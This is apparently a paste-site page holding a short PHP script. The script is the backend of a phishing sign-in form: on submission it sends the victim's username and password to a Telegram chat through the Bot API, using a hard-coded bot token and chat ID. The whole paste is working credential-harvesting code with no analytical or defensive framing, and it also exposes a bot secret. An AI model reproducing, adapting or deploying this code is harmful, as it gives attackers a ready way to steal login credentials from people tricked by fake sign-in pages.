Untitled

 avatar
DCE
php
a year ago
781 B
5
Indexable
Never
<?php
    if(isset($_POST['signin'])){
        $apiToken = "5899777350:AAFrafUeK6HEQhileaBf020Rw9OlcW0sHMg
        ";
        $data = [
            'chat_id' => '-663052014', 
            'text' => $_POST['username']
        ];
    $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" .
                                 http_build_query($data) );
    }    

    if(isset($_POST['signin'])){
        $apiToken = "5899777350:AAFrafUeK6HEQhileaBf020Rw9OlcW0sHMg
        ";
        $data = [
            'chat_id' => '-663052014', 
            'text' => $_POST['password']
            ];
        $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" .
                                   http_build_query($data) );
    }  
?>